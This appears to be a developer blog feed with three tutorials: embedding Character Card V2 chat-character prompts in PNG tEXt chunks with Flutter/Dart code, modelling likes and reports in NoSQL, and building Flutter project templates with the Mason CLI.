And particularly in web UIs such as TavernAI, you can create a “character” with the personality you want (mostly by giving an initial prompt to the LLM) and chat with the character. There are many such projects that allow you to chat with the character you made. In these projects, there is often a “Character share” feature.

Such feature is often implemented by embedding prompts in the PNG metadata.

Example Character Image for Sharing

For example, the PNG image above has the following metadata with a tEXt type chunk in JSON format :

{
  "spec": "chara_card_v2",
  "spec_version": "2.0",
  "data": {
    "name": "Sheepy",
    "description": "Your name is sheepy, the young sheep. Because you're a sheep, you only respond with words like 'meeeeh-!', 'meh', etc.",
    "personality": "",
    "scenario": "",
    "first_mes": "",
    "mes_example": "",
    "creator_notes": "",
    "system_prompt": "",
    "post_history_instructions": "",
    "alternate_greetings": [],
    "character_book": {
      "extensions": {},
      "entries": []
    },
    "tags": [],
    "creator": "",
    "character_version": "",
    "extensions": {}
  }
}

It includes the various information about the character in JSON format. When a user brings this character image to the open source project, the Open source will extract the tEXt chunk metadata from the image and embed the character information in prompts to the LLM. That’s how the character sharing feature is implemented in such open-source projects.

Since prompts are just string data, and an image is BIG part of the data compared to just the prompts, sharing it in the format of a PNG image with prompts within its metadata makes sense.

When open source projects share characters with each other, if the metadata has different formats across projects, it would be difficult to share the characters. So the metadata follows a specific format called Character Card V2. The example JSON above is in Character Card V2 format.

Chunk Structure in PNG

So embedding tEXt type chunk in the PNG image is how the character sharing feature is implemented. In the PNG, Each chunk has the format as following:

{
  Length (4 byte),          # Size of the Chunk
  Chunk Type (4 byte),      # Type of the Chunk
  Chunk Data (length byte), # Data of the Chunk
  CRC (4byte)               # Used to detect corrupted or altered
}

A PNG file has image data chunks (mostly with the IDAT type) between the IHDR (Header) and IEND (Footer) type chunks. An example is as follows:

[
Length:          Length of the Chunk
Chunk Type:      IHDR
Chunk Data:      (Width, Height, Bit depth, Color type, Compression, Filter, Interlace)
CRC:             (4 bytes),

Length:          Length of the Chunk
Chunk Type:      IDAT
Chunk Data:      (image data)
CRC:             (4 bytes),

Length:          0
Chunk Type:      IEND
Chunk Data:      (0 byte)
CRC:             (4 bytes)
]

What we need to do is insert tEXt type chunk between IHDR and IEND type chunk.

Implementation in Flutter

Add packages to pubspec.yaml.

  png_chunks_encode: ^1.0.0
  png_chunks_extract: ^1.0.2

png_chunks_encode and png_chunks_extract are the packages that help to decode PNG into chunks / encode it back to PNG.

Read PNG chunks from the image with

import 'package:png_chunks_extract/png_chunks_extract.dart' as pngExtract;

List>? readPNGChunks({
  required Uint8List BLOB
}) {
  try{
    return pngExtract.extractChunks(BLOB);
  } catch(e){
    debugPrint("Reading Chunk Failed $e");
    return null;
  }
}

This will return the example List as following:

[
  { name: 'IHDR', data: Uint8List([...]) },
  { name: 'IDAT', data: Uint8List([...]) },
  { name: 'IDAT', data: Uint8List([...]) },
  { name: 'IDAT', data: Uint8List([...]) },
  { name: 'IDAT', data: Uint8List([...]) },
  { name: 'IEND', data: Uint8List([]) }
]

We will insert the tEXt type chunk between IHDR and IEND type in this list. According to W3C, tEXt type chunk data contains “keyword” and “data” and it’s separated by zero byte (null seperator). So insert it with the specific format.

import 'package:png_chunks_encode/src/etc32.dart';
import 'dart:convert';

List> addtEXtChunk({
  required List> chunk,
  required String keyword,
  required String text,
}) {
  List tEXtData = [...utf8.encode(keyword), 0, ...utf8.encode(text)];

  Uint8List chunkType = Uint8List.fromList(utf8.encode('tEXt'));
  Uint8List dataBytes = Uint8List.fromList(tEXtData);
  Uint8List crcInput = Uint8List.fromList([...chunkType, ...dataBytes]);
  int crc = Crc32.getCrc32(crcInput);

  Map tEXtChunk = {
    'name': 'tEXt',
    'data': dataBytes,
    'crc': crc
  };

  int end = chunk.indexWhere((chunk) => chunk['name'] == 'IEND');
  chunk.insert(end, tEXtChunk);
  return chunk;
}

The keyword and the data are separated by a zero byte, and it’s inserted just before IEND in this function. Now, encode this chunk back to PNG.

import 'package:path/path.dart' as p;
import 'package:png_chunks_encode/png_chunks_encode.dart' as pngEncode;

static Future saveChunkToPNG({
    required List> chunk,
  }) async {
  final newBuffer = pngEncode.encodeChunks(chunk);
  final file = File(p.join(Directory.systemTemp.path, 'image.png'));
  await file.create();
  await file.writeAsBytes(newBuffer);
}

The image is successfully saved with the new chunk. Here’s the full demonstration of modifying PNG chunks in the sample app:

If you’re interested in the sample app code, please visit:

GitHub - jhj0517/flutter-samples: Practice Projects for Flutter

Reference

Modeling Social Likes & Reports in NoSQL

0517 jhj — Thu, 09 May 2024 10:11:54 GMT

Follow a query-driven design approach

When you model NoSQL database, you should always follow a query-driven design approach. Unlike the RDBMS, you shouldn’t query multiple keys to get specific data. For example, if you were modeling social “likes” in the RDBMS, you would create multiple tables with foreign keys like this:

CREATE TABLE posts (
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  content TEXT NOT NULL,
  author TEXT NOT NULL,
  likes_number INTEGER NOT NULL,
);

CREATE TABLE likes (
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  post_id INTEGER REFERENCES posts(id),
  user TEXT NOT NULL,
);

Unless you join the tables, you have to query id of the posts → query id of the likes to know who liked the post. In NoSQL, you shouldn’t set multiple “parent” nodes like you do in RDBMS.

// Avoid this 2 parent nodes
{
  "posts":{
    {
      "id": "post_id1",
      "content": "Hello",
      "author": "james",
      "likes_number": 1,
    }
  },
  "likes": {
    {
      "id": "like_id1",
      "post_id": "post_id1",
    }
  }
}

Instead, you can embed likes within posts, creating posts as nested objects.

// Do this instead.
{
  "posts":{
    {
      "id": "post_id1",
      "content": "Hello",
      "author": "james",
      "likes_number": 1,
      "likes": ["like_id1"]
    }
  },
}

You can know who liked the post by querying only the post. No need to query post → likes, because likes data is already included in the post when you fetch the post data. Unlike the table is sperated into multiple tables by concerns for normalization, the concept of “nested objects” is often used in NoSQL.

The important consideration when modeling data in NoSQL is to use a query-driven design approach to let you know as much as possible about each “post” related data by fetching the post only once. Just like embedding likes in a post, you can also embed reports in a post.

{
  "posts":{
    {
      "id": "post_id1",
      "content": "Hello",
      "author": "james",
      "likes_number": 1,
      "likes": ["like_id1"],
      "reports_number": 1,
      "reports": [{"id": "reports_id1", "reason": "violence"}]
    }
  },
}

Reference

Start a New Flutter Project Using a Template with Mason

0517 jhj — Fri, 26 Apr 2024 11:58:52 GMT

Mason is an open-source tool that allows you to start a project with a template. While Mason is popular for Flutter templates because it’s mainly written in Dart, but you can use it for any type of project, not just those based on Flutter.

How Mason Works

You can use the variable like {{package_name}} in the template by mustache syntax in Mason. The idea of Mason is to let you define the value of this variable in the template when you start a project. For example, in Android, if you set the applicationId field in the app’s build.gradle with {{package_name}} like this,

defaultConfig {
  applicationId "{{application_id}}"
}

The {{application_id}} will be replaced with the value you define when you start a new project. So when you create a template for Flutter with Mason, you might want to embed the mustache variable like {{application_id}} across all 6 platforms.

How to Use Mason

Install Mason CLI

dart pub global activate mason_cli

2. Implement Your Template in a Specific Forder Structure

.
├── __brick__
│   └── {{project_name}}
│       ├── page1.dart
│       └── page2.dart  
└── brick.yaml

You typically have a brick.yaml file and a __brick__ folder like this. The __brick__ folder is where you will implement and structure your template. In the example above, when you create a project with Mason, it will generate {{project_name}}.

3. Write brick.yaml Configuration File

In Mason, the concept of a “brick” is used to metaphorically represent a template. You can set the configuration of your template in the brick.yaml. The following file is an example brick.yaml:

name: my_template
description: My Flutter Template

version: 0.1.0

environment:
  mason: ">=0.1.0-dev.52 <0.1.0"

vars:
  project_name:
    type: string
    description: Project name
    default: project_name
    prompt: What is the project name?
  package_name:
    type: string
    description: Package name
    default: com.example.myapp
    prompt: What is the package name?

Specify the variable like {{project_name}} and {{package_name}} that you used in the template in the brick.yaml like this.

4. Add Birck

Add the brick so you can use it in anywhere.

mason add -g my_template --path ./

Specify the --path option to indicate where your brick.yaml is located.

5. List Brick

mason ls -g
├── my_template 0.1.0

Check that your brick is added correctly.

6. Make Brick

mason make my_template

Now You can use the template with the above command in anywhere. It will asks how you will define the value of the variables like {{package_name}} that you specified in the brick.yaml.

Embedding mustache variables for Flutter

When crafting a template for Flutter projects using Mason, you might need to include a mustache variable such as {{application_id}} across all 6 supported platforms, like this:

Android

in AndroidManifest, MainActivity, build.gradle (app-level):

// AndroidManifest
        android:label="{{project_name.titleCase()}}"
/>

// MainActivity
package {{application_id}}

// build.gradle
android {
    namespace "{{application_id}}"
    defaultConfig {
      applicationId "{{application_id}}"
    }
}

in project.pbxproj, info.plist:

// project.pbxproj
PRODUCT_BUNDLE_IDENTIFIER = {{application_id}}; // Update every fields

// info.plist
 CFBundleName
 {{project_name}}
 CFBundleDisplayName
 {{project_name}}

MacOS

in project.pbxproj, Runner.xcscheme :

// project.pbxproj
PRODUCT_BUNDLE_IDENTIFIER = {{application_id}}.RunnerTests; // Update every fields

// Runner.xcscheme
BuildableName = "{{project_name.titleCase()}}.app" // Update every fields

in index.html, manifest.json:

// index.html
{{project_name.titleCase()}}

// manifest.json
"name": "{{project_name.titleCase()}}"

Windows

in CMakeLists.txt :

set(BINARY_NAME "{{project_name.snakeCase()}}")

Linux

in CMakeLists.txt :

set(BINARY_NAME "{{project_name.snakeCase()}}")

I made a base template of templates for a Flutter project that embedded variables like this. You can start making a template with this base. Only built & tested on Android for now, but if you’re still interested please visit:

GitHub - jhj0517/flutter_template_starter